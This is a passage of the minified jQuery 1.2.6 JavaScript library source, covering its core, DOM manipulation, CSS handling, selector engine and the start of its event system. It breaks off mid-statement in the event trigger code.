/*
 * jQuery 1.2.6 - New Wave Javascript
 *
 * Copyright (c) 2008 John Resig (jquery.com)
 * Dual licensed under the MIT (MIT-LICENSE.txt)
 * and GPL (GPL-LICENSE.txt) licenses.
 *
 * $Date: 2008/06/23 22:58:52 $
 * $Rev: 5685 $
 */
(function(){var _jQuery=window.jQuery,_$=window.$;var jQuery=window.jQuery=window.$=function(selector,context){return new jQuery.fn.init(selector,context);};var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,isSimple=/^.[^:#\[\.]*$/,undefined;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}if(typeof selector=="string"){var match=quickExpr.exec(selector);if(match&&(match[1]||!context)){if(match[1])selector=jQuery.clean([match[1]],context);else{var elem=document.getElementById(match[3]);if(elem){if(elem.id!=match[3])return jQuery().find(selector);return jQuery(elem);}selector=[];}}else
return jQuery(context).find(selector);}else if(jQuery.isFunction(selector))return jQuery(document)[jQuery.fn.ready?"ready":"load"](selector);return this.setArray(jQuery.makeArray(selector));},jquery:"1.2.6",size:function(){return this.length;},length:0,get:function(num){return num==undefined?jQuery.makeArray(this):this[num];},pushStack:function(elems){var ret=jQuery(elems);ret.prevObject=this;return ret;},setArray:function(elems){this.length=0;Array.prototype.push.apply(this,elems);return this;},each:function(callback,args){return jQuery.each(this,callback,args);},index:function(elem){var ret=-1;return jQuery.inArray(elem&&elem.jquery?elem[0]:elem,this);},attr:function(name,value,type){var options=name;if(name.constructor==String)if(value===undefined)return this[0]&&jQuery[type||"attr"](this[0],name);else{options={};options[name]=value;}return this.each(function(i){for(name in options)jQuery.attr(type?this.style:this,name,jQuery.prop(this,options[name],type,i,name));});},css:function(key,value){if((key=='width'||key=='height')&&parseFloat(value)<0)value=undefined;return this.attr(key,value,"curCSS");},text:function(text){if(typeof text!="object"&&text!=null)return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(text));var ret="";jQuery.each(text||this,function(){jQuery.each(this.childNodes,function(){if(this.nodeType!=8)ret+=this.nodeType!=1?this.nodeValue:jQuery.fn.text([this]);});});return ret;},wrapAll:function(html){if(this[0])jQuery(html,this[0].ownerDocument).clone().insertBefore(this[0]).map(function(){var elem=this;while(elem.firstChild)elem=elem.firstChild;return elem;}).append(this);return this;},wrapInner:function(html){return this.each(function(){jQuery(this).contents().wrapAll(html);});},wrap:function(html){return this.each(function(){jQuery(this).wrapAll(html);});},append:function(){return this.domManip(arguments,true,false,function(elem){if(this.nodeType==1)this.appendChild(elem);});},prepend:function(){return this.domManip(arguments,true,true,function(elem){if(this.nodeType==1)this.insertBefore(elem,this.firstChild);});},before:function(){return this.domManip(arguments,false,false,function(elem){this.parentNode.insertBefore(elem,this);});},after:function(){return this.domManip(arguments,false,true,function(elem){this.parentNode.insertBefore(elem,this.nextSibling);});},end:function(){return this.prevObject||jQuery([]);},find:function(selector){var elems=jQuery.map(this,function(elem){return jQuery.find(selector,elem);});return this.pushStack(/[^+>] [^+>]/.test(selector)||selector.indexOf("..")>-1?jQuery.unique(elems):elems);},clone:function(events){var ret=this.map(function(){if(jQuery.browser.msie&&!jQuery.isXMLDoc(this)){var clone=this.cloneNode(true),container=document.createElement("div");container.appendChild(clone);return jQuery.clean([container.innerHTML])[0];}else
return this.cloneNode(true);});var clone=ret.find("*").andSelf().each(function(){if(this[expando]!=undefined)this[expando]=null;});if(events===true)this.find("*").andSelf().each(function(i){if(this.nodeType==3)return;var events=jQuery.data(this,"events");for(var type in events)for(var handler in events[type])jQuery.event.add(clone[i],type,events[type][handler],events[type][handler].data);});return ret;},filter:function(selector){return this.pushStack(jQuery.isFunction(selector)&&jQuery.grep(this,function(elem,i){return selector.call(elem,i);})||jQuery.multiFilter(selector,this));},not:function(selector){if(selector.constructor==String)if(isSimple.test(selector))return this.pushStack(jQuery.multiFilter(selector,this,true));else
selector=jQuery.multiFilter(selector,this);var isArrayLike=selector.length&&selector[selector.length-1]!==undefined&&!selector.nodeType;return this.filter(function(){return isArrayLike?jQuery.inArray(this,selector)<0:this!=selector;});},add:function(selector){return this.pushStack(jQuery.unique(jQuery.merge(this.get(),typeof selector=='string'?jQuery(selector):jQuery.makeArray(selector))));},is:function(selector){return!!selector&&jQuery.multiFilter(selector,this).length>0;},hasClass:function(selector){return this.is("."+selector);},val:function(value){if(value==undefined){if(this.length){var elem=this[0];if(jQuery.nodeName(elem,"select")){var index=elem.selectedIndex,values=[],options=elem.options,one=elem.type=="select-one";if(index<0)return null;for(var i=one?index:0,max=one?index+1:options.length;i<max;i++){var option=options[i];if(option.selected){value=jQuery.browser.msie&&!option.attributes.value.specified?option.text:option.value;if(one)return value;values.push(value);}}return values;}else
return(this[0].value||"").replace(/\r/g,"");}return undefined;}if(value.constructor==Number)value+='';return this.each(function(){if(this.nodeType!=1)return;if(value.constructor==Array&&/radio|checkbox/.test(this.type))this.checked=(jQuery.inArray(this.value,value)>=0||jQuery.inArray(this.name,value)>=0);else if(jQuery.nodeName(this,"select")){var values=jQuery.makeArray(value);jQuery("option",this).each(function(){this.selected=(jQuery.inArray(this.value,values)>=0||jQuery.inArray(this.text,values)>=0);});if(!values.length)this.selectedIndex=-1;}else
this.value=value;});},html:function(value){return value==undefined?(this[0]?this[0].innerHTML:null):this.empty().append(value);},replaceWith:function(value){return this.after(value).remove();},eq:function(i){return this.slice(i,i+1);},slice:function(){return this.pushStack(Array.prototype.slice.apply(this,arguments));},map:function(callback){return this.pushStack(jQuery.map(this,function(elem,i){return callback.call(elem,i,elem);}));},andSelf:function(){return this.add(this.prevObject);},data:function(key,value){var parts=key.split(".");parts[1]=parts[1]?"."+parts[1]:"";if(value===undefined){var data=this.triggerHandler("getData"+parts[1]+"!",[parts[0]]);if(data===undefined&&this.length)data=jQuery.data(this[0],key);return data===undefined&&parts[1]?this.data(parts[0]):data;}else
return this.trigger("setData"+parts[1]+"!",[parts[0],value]).each(function(){jQuery.data(this,key,value);});},removeData:function(key){return this.each(function(){jQuery.removeData(this,key);});},domManip:function(args,table,reverse,callback){var clone=this.length>1,elems;return this.each(function(){if(!elems){elems=jQuery.clean(args,this.ownerDocument);if(reverse)elems.reverse();}var obj=this;if(table&&jQuery.nodeName(this,"table")&&jQuery.nodeName(elems[0],"tr"))obj=this.getElementsByTagName("tbody")[0]||this.appendChild(this.ownerDocument.createElement("tbody"));var scripts=jQuery([]);jQuery.each(elems,function(){var elem=clone?jQuery(this).clone(true)[0]:this;if(jQuery.nodeName(elem,"script"))scripts=scripts.add(elem);else{if(elem.nodeType==1)scripts=scripts.add(jQuery("script",elem).remove());callback.call(obj,elem);}});scripts.each(evalScript);});}};jQuery.fn.init.prototype=jQuery.fn;function evalScript(i,elem){if(elem.src)jQuery.ajax({url:elem.src,async:false,dataType:"script"});else
jQuery.globalEval(elem.text||elem.textContent||elem.innerHTML||"");if(elem.parentNode)elem.parentNode.removeChild(elem);}function now(){return+new Date;}jQuery.extend=jQuery.fn.extend=function(){var target=arguments[0]||{},i=1,length=arguments.length,deep=false,options;if(target.constructor==Boolean){deep=target;target=arguments[1]||{};i=2;}if(typeof target!="object"&&typeof target!="function")target={};if(length==i){target=this;--i;}for(;i<length;i++)if((options=arguments[i])!=null)for(var name in options){var src=target[name],copy=options[name];if(target===copy)continue;if(deep&&copy&&typeof copy=="object"&&!copy.nodeType)target[name]=jQuery.extend(deep,src||(copy.length!=null?[]:{}),copy);else if(copy!==undefined)target[name]=copy;}return target;};var expando="jQuery"+now(),uuid=0,windowData={},exclude=/z-?index|font-?weight|opacity|zoom|line-?height/i,defaultView=document.defaultView||{};jQuery.extend({noConflict:function(deep){window.$=_$;if(deep)window.jQuery=_jQuery;return jQuery;},isFunction:function(fn){return!!fn&&typeof fn!="string"&&!fn.nodeName&&fn.constructor!=Array&&/^[\s[]?function/.test(fn+"");},isXMLDoc:function(elem){return elem.documentElement&&!elem.body||elem.tagName&&elem.ownerDocument&&!elem.ownerDocument.body;},globalEval:function(data){data=jQuery.trim(data);if(data){var head=document.getElementsByTagName("head")[0]||document.documentElement,script=document.createElement("script");script.type="text/javascript";if(jQuery.browser.msie)script.text=data;else
script.appendChild(document.createTextNode(data));head.insertBefore(script,head.firstChild);head.removeChild(script);}},nodeName:function(elem,name){return elem.nodeName&&elem.nodeName.toUpperCase()==name.toUpperCase();},cache:{},data:function(elem,name,data){elem=elem==window?windowData:elem;var id=elem[expando];if(!id)id=elem[expando]=++uuid;if(name&&!jQuery.cache[id])jQuery.cache[id]={};if(data!==undefined)jQuery.cache[id][name]=data;return name?jQuery.cache[id][name]:id;},removeData:function(elem,name){elem=elem==window?windowData:elem;var id=elem[expando];if(name){if(jQuery.cache[id]){delete jQuery.cache[id][name];name="";for(name in jQuery.cache[id])break;if(!name)jQuery.removeData(elem);}}else{try{delete elem[expando];}catch(e){if(elem.removeAttribute)elem.removeAttribute(expando);}delete jQuery.cache[id];}},each:function(object,callback,args){var name,i=0,length=object.length;if(args){if(length==undefined){for(name in object)if(callback.apply(object[name],args)===false)break;}else
for(;i<length;)if(callback.apply(object[i++],args)===false)break;}else{if(length==undefined){for(name in object)if(callback.call(object[name],name,object[name])===false)break;}else
for(var value=object[0];i<length&&callback.call(value,i,value)!==false;value=object[++i]){}}return object;},prop:function(elem,value,type,i,name){if(jQuery.isFunction(value))value=value.call(elem,i);return value&&value.constructor==Number&&type=="curCSS"&&!exclude.test(name)?value+"px":value;},className:{add:function(elem,classNames){jQuery.each((classNames||"").split(/\s+/),function(i,className){if(elem.nodeType==1&&!jQuery.className.has(elem.className,className))elem.className+=(elem.className?" ":"")+className;});},remove:function(elem,classNames){if(elem.nodeType==1)elem.className=classNames!=undefined?jQuery.grep(elem.className.split(/\s+/),function(className){return!jQuery.className.has(classNames,className);}).join(" "):"";},has:function(elem,className){return jQuery.inArray(className,(elem.className||elem).toString().split(/\s+/))>-1;}},swap:function(elem,options,callback){var old={};for(var name in options){old[name]=elem.style[name];elem.style[name]=options[name];}callback.call(elem);for(var name in options)elem.style[name]=old[name];},css:function(elem,name,force){if(name=="width"||name=="height"){var val,props={position:"absolute",visibility:"hidden",display:"block"},which=name=="width"?["Left","Right"]:["Top","Bottom"];function getWH(){val=name=="width"?elem.offsetWidth:elem.offsetHeight;var padding=0,border=0;jQuery.each(which,function(){padding+=parseFloat(jQuery.curCSS(elem,"padding"+this,true))||0;border+=parseFloat(jQuery.curCSS(elem,"border"+this+"Width",true))||0;});val-=Math.round(padding+border);}if(jQuery(elem).is(":visible"))getWH();else
jQuery.swap(elem,props,getWH);return Math.max(0,val);}return jQuery.curCSS(elem,name,force);},curCSS:function(elem,name,force){var ret,style=elem.style;function color(elem){if(!jQuery.browser.safari)return false;var ret=defaultView.getComputedStyle(elem,null);return!ret||ret.getPropertyValue("color")=="";}if(name=="opacity"&&jQuery.browser.msie){ret=jQuery.attr(style,"opacity");return ret==""?"1":ret;}if(jQuery.browser.opera&&name=="display"){var save=style.outline;style.outline="0 solid black";style.outline=save;}if(name.match(/float/i))name=styleFloat;if(!force&&style&&style[name])ret=style[name];else if(defaultView.getComputedStyle){if(name.match(/float/i))name="float";name=name.replace(/([A-Z])/g,"-$1").toLowerCase();var computedStyle=defaultView.getComputedStyle(elem,null);if(computedStyle&&!color(elem))ret=computedStyle.getPropertyValue(name);else{var swap=[],stack=[],a=elem,i=0;for(;a&&color(a);a=a.parentNode)stack.unshift(a);for(;i<stack.length;i++)if(color(stack[i])){swap[i]=stack[i].style.display;stack[i].style.display="block";}ret=name=="display"&&swap[stack.length-1]!=null?"none":(computedStyle&&computedStyle.getPropertyValue(name))||"";for(i=0;i<swap.length;i++)if(swap[i]!=null)stack[i].style.display=swap[i];}if(name=="opacity"&&ret=="")ret="1";}else if(elem.currentStyle){var camelCase=name.replace(/\-(\w)/g,function(all,letter){return letter.toUpperCase();});ret=elem.currentStyle[name]||elem.currentStyle[camelCase];if(!/^\d+(px)?$/i.test(ret)&&/^\d/.test(ret)){var left=style.left,rsLeft=elem.runtimeStyle.left;elem.runtimeStyle.left=elem.currentStyle.left;style.left=ret||0;ret=style.pixelLeft+"px";style.left=left;elem.runtimeStyle.left=rsLeft;}}return ret;},clean:function(elems,context){var ret=[];context=context||document;if(typeof context.createElement=='undefined')context=context.ownerDocument||context[0]&&context[0].ownerDocument||document;jQuery.each(elems,function(i,elem){if(!elem)return;if(elem.constructor==Number)elem+='';if(typeof elem=="string"){elem=elem.replace(/(<(\w+)[^>]*?)\/>/g,function(all,front,tag){return tag.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i)?all:front+"></"+tag+">";});var tags=jQuery.trim(elem).toLowerCase(),div=context.createElement("div");var wrap=!tags.indexOf("<opt")&&[1,"<select multiple='multiple'>","</select>"]||!tags.indexOf("<leg")&&[1,"<fieldset>","</fieldset>"]||tags.match(/^<(thead|tbody|tfoot|colg|cap)/)&&[1,"<table>","</table>"]||!tags.indexOf("<tr")&&[2,"<table><tbody>","</tbody></table>"]||(!tags.indexOf("<td")||!tags.indexOf("<th"))&&[3,"<table><tbody><tr>","</tr></tbody></table>"]||!tags.indexOf("<col")&&[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"]||jQuery.browser.msie&&[1,"div<div>","</div>"]||[0,"",""];div.innerHTML=wrap[1]+elem+wrap[2];while(wrap[0]--)div=div.lastChild;if(jQuery.browser.msie){var tbody=!tags.indexOf("<table")&&tags.indexOf("<tbody")<0?div.firstChild&&div.firstChild.childNodes:wrap[1]=="<table>"&&tags.indexOf("<tbody")<0?div.childNodes:[];for(var j=tbody.length-1;j>=0;--j)if(jQuery.nodeName(tbody[j],"tbody")&&!tbody[j].childNodes.length)tbody[j].parentNode.removeChild(tbody[j]);if(/^\s/.test(elem))div.insertBefore(context.createTextNode(elem.match(/^\s*/)[0]),div.firstChild);}elem=jQuery.makeArray(div.childNodes);}if(elem.length===0&&(!jQuery.nodeName(elem,"form")&&!jQuery.nodeName(elem,"select")))return;if(elem[0]==undefined||jQuery.nodeName(elem,"form")||elem.options)ret.push(elem);else
ret=jQuery.merge(ret,elem);});return ret;},attr:function(elem,name,value){if(!elem||elem.nodeType==3||elem.nodeType==8)return undefined;var notxml=!jQuery.isXMLDoc(elem),set=value!==undefined,msie=jQuery.browser.msie;name=notxml&&jQuery.props[name]||name;if(elem.tagName){var special=/href|src|style/.test(name);if(name=="selected"&&jQuery.browser.safari)elem.parentNode.selectedIndex;if(name in elem&&notxml&&!special){if(set){if(name=="type"&&jQuery.nodeName(elem,"input")&&elem.parentNode)throw"type property can't be changed";elem[name]=value;}if(jQuery.nodeName(elem,"form")&&elem.getAttributeNode(name))return elem.getAttributeNode(name).nodeValue;return elem[name];}if(msie&&notxml&&name=="style")return jQuery.attr(elem.style,"cssText",value);if(set)elem.setAttribute(name,""+value);var attr=msie&&notxml&&special?elem.getAttribute(name,2):elem.getAttribute(name);return attr===null?undefined:attr;}if(msie&&name=="opacity"){if(set){elem.zoom=1;elem.filter=(elem.filter||"").replace(/alpha\([^)]*\)/,"")+(parseInt(value)+''=="NaN"?"":"alpha(opacity="+value*100+")");}return elem.filter&&elem.filter.indexOf("opacity=")>=0?(parseFloat(elem.filter.match(/opacity=([^)]*)/)[1])/100)+'':"";}name=name.replace(/-([a-z])/ig,function(all,letter){return letter.toUpperCase();});if(set)elem[name]=value;return elem[name];},trim:function(text){return(text||"").replace(/^\s+|\s+$/g,"");},makeArray:function(array){var ret=[];if(array!=null){var i=array.length;if(i==null||array.split||array.setInterval||array.call)ret[0]=array;else
while(i)ret[--i]=array[i];}return ret;},inArray:function(elem,array){for(var i=0,length=array.length;i<length;i++)if(array[i]===elem)return i;return-1;},merge:function(first,second){var i=0,elem,pos=first.length;if(jQuery.browser.msie){while(elem=second[i++])if(elem.nodeType!=8)first[pos++]=elem;}else
while(elem=second[i++])first[pos++]=elem;return first;},unique:function(array){var ret=[],done={};try{for(var i=0,length=array.length;i<length;i++){var id=jQuery.data(array[i]);if(!done[id]){done[id]=true;ret.push(array[i]);}}}catch(e){ret=array;}return ret;},grep:function(elems,callback,inv){var ret=[];for(var i=0,length=elems.length;i<length;i++)if(!inv!=!callback(elems[i],i))ret.push(elems[i]);return ret;},map:function(elems,callback){var ret=[];for(var i=0,length=elems.length;i<length;i++){var value=callback(elems[i],i);if(value!=null)ret[ret.length]=value;}return ret.concat.apply([],ret);}});var userAgent=navigator.userAgent.toLowerCase();jQuery.browser={version:(userAgent.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[])[1],safari:/webkit/.test(userAgent),opera:/opera/.test(userAgent),msie:/msie/.test(userAgent)&&!/opera/.test(userAgent),mozilla:/mozilla/.test(userAgent)&&!/(compatible|webkit)/.test(userAgent)};var styleFloat=jQuery.browser.msie?"styleFloat":"cssFloat";jQuery.extend({boxModel:!jQuery.browser.msie||document.compatMode=="CSS1Compat",props:{"for":"htmlFor","class":"className","float":styleFloat,cssFloat:styleFloat,styleFloat:styleFloat,readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing"}});jQuery.each({parent:function(elem){return elem.parentNode;},parents:function(elem){return jQuery.dir(elem,"parentNode");},next:function(elem){return jQuery.nth(elem,2,"nextSibling");},prev:function(elem){return jQuery.nth(elem,2,"previousSibling");},nextAll:function(elem){return jQuery.dir(elem,"nextSibling");},prevAll:function(elem){return jQuery.dir(elem,"previousSibling");},siblings:function(elem){return jQuery.sibling(elem.parentNode.firstChild,elem);},children:function(elem){return jQuery.sibling(elem.firstChild);},contents:function(elem){return jQuery.nodeName(elem,"iframe")?elem.contentDocument||elem.contentWindow.document:jQuery.makeArray(elem.childNodes);}},function(name,fn){jQuery.fn[name]=function(selector){var ret=jQuery.map(this,fn);if(selector&&typeof selector=="string")ret=jQuery.multiFilter(selector,ret);return this.pushStack(jQuery.unique(ret));};});jQuery.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(name,original){jQuery.fn[name]=function(){var args=arguments;return this.each(function(){for(var i=0,length=args.length;i<length;i++)jQuery(args[i])[original](this);});};});jQuery.each({removeAttr:function(name){jQuery.attr(this,name,"");if(this.nodeType==1)this.removeAttribute(name);},addClass:function(classNames){jQuery.className.add(this,classNames);},removeClass:function(classNames){jQuery.className.remove(this,classNames);},toggleClass:function(classNames){jQuery.className[jQuery.className.has(this,classNames)?"remove":"add"](this,classNames);},remove:function(selector){if(!selector||jQuery.filter(selector,[this]).r.length){jQuery("*",this).add(this).each(function(){jQuery.event.remove(this);jQuery.removeData(this);});if(this.parentNode)this.parentNode.removeChild(this);}},empty:function(){jQuery(">*",this).remove();while(this.firstChild)this.removeChild(this.firstChild);}},function(name,fn){jQuery.fn[name]=function(){return this.each(fn,arguments);};});jQuery.each(["Height","Width"],function(i,name){var type=name.toLowerCase();jQuery.fn[type]=function(size){return this[0]==window?jQuery.browser.opera&&document.body["client"+name]||jQuery.browser.safari&&window["inner"+name]||document.compatMode=="CSS1Compat"&&document.documentElement["client"+name]||document.body["client"+name]:this[0]==document?Math.max(Math.max(document.body["scroll"+name],document.documentElement["scroll"+name]),Math.max(document.body["offset"+name],document.documentElement["offset"+name])):size==undefined?(this.length?jQuery.css(this[0],type):null):this.css(type,size.constructor==String?size:size+"px");};});function num(elem,prop){return elem[0]&&parseInt(jQuery.curCSS(elem[0],prop,true),10)||0;}var chars=jQuery.browser.safari&&parseInt(jQuery.browser.version)<417?"(?:[\\w*_-]|\\\\.)":"(?:[\\w\u0128-\uFFFF*_-]|\\\\.)",quickChild=new RegExp("^>\\s*("+chars+"+)"),quickID=new RegExp("^("+chars+"+)(#)("+chars+"+)"),quickClass=new RegExp("^([#.]?)("+chars+"*)");jQuery.extend({expr:{"":function(a,i,m){return m[2]=="*"||jQuery.nodeName(a,m[2]);},"#":function(a,i,m){return a.getAttribute("id")==m[2];},":":{lt:function(a,i,m){return i<m[3]-0;},gt:function(a,i,m){return i>m[3]-0;},nth:function(a,i,m){return m[3]-0==i;},eq:function(a,i,m){return m[3]-0==i;},first:function(a,i){return i==0;},last:function(a,i,m,r){return i==r.length-1;},even:function(a,i){return i%2==0;},odd:function(a,i){return i%2;},"first-child":function(a){return a.parentNode.getElementsByTagName("*")[0]==a;},"last-child":function(a){return jQuery.nth(a.parentNode.lastChild,1,"previousSibling")==a;},"only-child":function(a){return!jQuery.nth(a.parentNode.lastChild,2,"previousSibling");},parent:function(a){return a.firstChild;},empty:function(a){return!a.firstChild;},contains:function(a,i,m){return(a.textContent||a.innerText||jQuery(a).text()||"").indexOf(m[3])>=0;},visible:function(a){return"hidden"!=a.type&&jQuery.css(a,"display")!="none"&&jQuery.css(a,"visibility")!="hidden";},hidden:function(a){return"hidden"==a.type||jQuery.css(a,"display")=="none"||jQuery.css(a,"visibility")=="hidden";},enabled:function(a){return!a.disabled;},disabled:function(a){return a.disabled;},checked:function(a){return a.checked;},selected:function(a){return a.selected||jQuery.attr(a,"selected");},text:function(a){return"text"==a.type;},radio:function(a){return"radio"==a.type;},checkbox:function(a){return"checkbox"==a.type;},file:function(a){return"file"==a.type;},password:function(a){return"password"==a.type;},submit:function(a){return"submit"==a.type;},image:function(a){return"image"==a.type;},reset:function(a){return"reset"==a.type;},button:function(a){return"button"==a.type||jQuery.nodeName(a,"button");},input:function(a){return/input|select|textarea|button/i.test(a.nodeName);},has:function(a,i,m){return jQuery.find(m[3],a).length;},header:function(a){return/h\d/i.test(a.nodeName);},animated:function(a){return jQuery.grep(jQuery.timers,function(fn){return a==fn.elem;}).length;}}},parse:[/^(\[) *@?([\w-]+) *([!*$^~=]*) *('?"?)(.*?)\4 *\]/,/^(:)([\w-]+)\("?'?(.*?(\(.*?\))?[^(]*?)"?'?\)/,new RegExp("^([:.#]*)("+chars+"+)")],multiFilter:function(expr,elems,not){var old,cur=[];while(expr&&expr!=old){old=expr;var f=jQuery.filter(expr,elems,not);expr=f.t.replace(/^\s*,\s*/,"");cur=not?elems=f.r:jQuery.merge(cur,f.r);}return cur;},find:function(t,context){if(typeof t!="string")return[t];if(context&&context.nodeType!=1&&context.nodeType!=9)return[];context=context||document;var ret=[context],done=[],last,nodeName;while(t&&last!=t){var r=[];last=t;t=jQuery.trim(t);var foundToken=false,re=quickChild,m=re.exec(t);if(m){nodeName=m[1].toUpperCase();for(var i=0;ret[i];i++)for(var c=ret[i].firstChild;c;c=c.nextSibling)if(c.nodeType==1&&(nodeName=="*"||c.nodeName.toUpperCase()==nodeName))r.push(c);ret=r;t=t.replace(re,"");if(t.indexOf(" ")==0)continue;foundToken=true;}else{re=/^([>+~])\s*(\w*)/i;if((m=re.exec(t))!=null){r=[];var merge={};nodeName=m[2].toUpperCase();m=m[1];for(var j=0,rl=ret.length;j<rl;j++){var n=m=="~"||m=="+"?ret[j].nextSibling:ret[j].firstChild;for(;n;n=n.nextSibling)if(n.nodeType==1){var id=jQuery.data(n);if(m=="~"&&merge[id])break;if(!nodeName||n.nodeName.toUpperCase()==nodeName){if(m=="~")merge[id]=true;r.push(n);}if(m=="+")break;}}ret=r;t=jQuery.trim(t.replace(re,""));foundToken=true;}}if(t&&!foundToken){if(!t.indexOf(",")){if(context==ret[0])ret.shift();done=jQuery.merge(done,ret);r=ret=[context];t=" "+t.substr(1,t.length);}else{var re2=quickID;var m=re2.exec(t);if(m){m=[0,m[2],m[3],m[1]];}else{re2=quickClass;m=re2.exec(t);}m[2]=m[2].replace(/\\/g,"");var elem=ret[ret.length-1];if(m[1]=="#"&&elem&&elem.getElementById&&!jQuery.isXMLDoc(elem)){var oid=elem.getElementById(m[2]);if((jQuery.browser.msie||jQuery.browser.opera)&&oid&&typeof oid.id=="string"&&oid.id!=m[2])oid=jQuery('[@id="'+m[2]+'"]',elem)[0];ret=r=oid&&(!m[3]||jQuery.nodeName(oid,m[3]))?[oid]:[];}else{for(var i=0;ret[i];i++){var tag=m[1]=="#"&&m[3]?m[3]:m[1]!=""||m[0]==""?"*":m[2];if(tag=="*"&&ret[i].nodeName.toLowerCase()=="object")tag="param";r=jQuery.merge(r,ret[i].getElementsByTagName(tag));}if(m[1]==".")r=jQuery.classFilter(r,m[2]);if(m[1]=="#"){var tmp=[];for(var i=0;r[i];i++)if(r[i].getAttribute("id")==m[2]){tmp=[r[i]];break;}r=tmp;}ret=r;}t=t.replace(re2,"");}}if(t){var val=jQuery.filter(t,r);ret=r=val.r;t=jQuery.trim(val.t);}}if(t)ret=[];if(ret&&context==ret[0])ret.shift();done=jQuery.merge(done,ret);return done;},classFilter:function(r,m,not){m=" "+m+" ";var tmp=[];for(var i=0;r[i];i++){var pass=(" "+r[i].className+" ").indexOf(m)>=0;if(!not&&pass||not&&!pass)tmp.push(r[i]);}return tmp;},filter:function(t,r,not){var last;while(t&&t!=last){last=t;var p=jQuery.parse,m;for(var i=0;p[i];i++){m=p[i].exec(t);if(m){t=t.substring(m[0].length);m[2]=m[2].replace(/\\/g,"");break;}}if(!m)break;if(m[1]==":"&&m[2]=="not")r=isSimple.test(m[3])?jQuery.filter(m[3],r,true).r:jQuery(r).not(m[3]);else if(m[1]==".")r=jQuery.classFilter(r,m[2],not);else if(m[1]=="["){var tmp=[],type=m[3];for(var i=0,rl=r.length;i<rl;i++){var a=r[i],z=a[jQuery.props[m[2]]||m[2]];if(z==null||/href|src|selected/.test(m[2]))z=jQuery.attr(a,m[2])||'';if((type==""&&!!z||type=="="&&z==m[5]||type=="!="&&z!=m[5]||type=="^="&&z&&!z.indexOf(m[5])||type=="$="&&z.substr(z.length-m[5].length)==m[5]||(type=="*="||type=="~=")&&z.indexOf(m[5])>=0)^not)tmp.push(a);}r=tmp;}else if(m[1]==":"&&m[2]=="nth-child"){var merge={},tmp=[],test=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(m[3]=="even"&&"2n"||m[3]=="odd"&&"2n+1"||!/\D/.test(m[3])&&"0n+"+m[3]||m[3]),first=(test[1]+(test[2]||1))-0,last=test[3]-0;for(var i=0,rl=r.length;i<rl;i++){var node=r[i],parentNode=node.parentNode,id=jQuery.data(parentNode);if(!merge[id]){var c=1;for(var n=parentNode.firstChild;n;n=n.nextSibling)if(n.nodeType==1)n.nodeIndex=c++;merge[id]=true;}var add=false;if(first==0){if(node.nodeIndex==last)add=true;}else if((node.nodeIndex-last)%first==0&&(node.nodeIndex-last)/first>=0)add=true;if(add^not)tmp.push(node);}r=tmp;}else{var fn=jQuery.expr[m[1]];if(typeof fn=="object")fn=fn[m[2]];if(typeof fn=="string")fn=eval("false||function(a,i){return "+fn+";}");r=jQuery.grep(r,function(elem,i){return fn(elem,i,m,r);},not);}}return{r:r,t:t};},dir:function(elem,dir){var matched=[],cur=elem[dir];while(cur&&cur!=document){if(cur.nodeType==1)matched.push(cur);cur=cur[dir];}return matched;},nth:function(cur,result,dir,elem){result=result||1;var num=0;for(;cur;cur=cur[dir])if(cur.nodeType==1&&++num==result)break;return cur;},sibling:function(n,elem){var r=[];for(;n;n=n.nextSibling){if(n.nodeType==1&&n!=elem)r.push(n);}return r;}});jQuery.event={add:function(elem,types,handler,data){if(elem.nodeType==3||elem.nodeType==8)return;if(jQuery.browser.msie&&elem.setInterval)elem=window;if(!handler.guid)handler.guid=this.guid++;if(data!=undefined){var fn=handler;handler=this.proxy(fn,function(){return fn.apply(this,arguments);});handler.data=data;}var events=jQuery.data(elem,"events")||jQuery.data(elem,"events",{}),handle=jQuery.data(elem,"handle")||jQuery.data(elem,"handle",function(){if(typeof jQuery!="undefined"&&!jQuery.event.triggered)return jQuery.event.handle.apply(arguments.callee.elem,arguments);});handle.elem=elem;jQuery.each(types.split(/\s+/),function(index,type){var parts=type.split(".");type=parts[0];handler.type=parts[1];var handlers=events[type];if(!handlers){handlers=events[type]={};if(!jQuery.event.special[type]||jQuery.event.special[type].setup.call(elem)===false){if(elem.addEventListener)elem.addEventListener(type,handle,false);else if(elem.attachEvent)elem.attachEvent("on"+type,handle);}}handlers[handler.guid]=handler;jQuery.event.global[type]=true;});elem=null;},guid:1,global:{},remove:function(elem,types,handler){if(elem.nodeType==3||elem.nodeType==8)return;var events=jQuery.data(elem,"events"),ret,index;if(events){if(types==undefined||(typeof types=="string"&&types.charAt(0)=="."))for(var type in events)this.remove(elem,type+(types||""));else{if(types.type){handler=types.handler;types=types.type;}jQuery.each(types.split(/\s+/),function(index,type){var parts=type.split(".");type=parts[0];if(events[type]){if(handler)delete events[type][handler.guid];else
for(handler in events[type])if(!parts[1]||events[type][handler].type==parts[1])delete events[type][handler];for(ret in events[type])break;if(!ret){if(!jQuery.event.special[type]||jQuery.event.special[type].teardown.call(elem)===false){if(elem.removeEventListener)elem.removeEventListener(type,jQuery.data(elem,"handle"),false);else if(elem.detachEvent)elem.detachEvent("on"+type,jQuery.data(elem,"handle"));}ret=null;delete events[type];}}});}for(ret in events)break;if(!ret){var handle=jQuery.data(elem,"handle");if(handle)handle.elem=null;jQuery.removeData(elem,"events");jQuery.removeData(elem,"handle");}}},trigger:function(type,data,elem,donative,extra){data=jQuery.makeArray(data);if(type.indexOf("!")>=0){type=type.slice(0,-1);var exclusive=true;}if(!elem){if(this.global[type])jQuery("*").add([window,document]).trigger(type,data);}else{if(elem.nodeType==3||elem.nodeType==8)return undefined;var val,ret,fn=jQuery.isFunction(elem[type]||null),event=!data[0]||!data[0].preventDefault;if(event){data.unshift({type:type,target:elem,preventDefault:function(){},stopPropagation:function(){},timeStamp:now()});data[0][expando]=true;}data[0].type=type;if(exclusive)data[0].exclusive=true;var 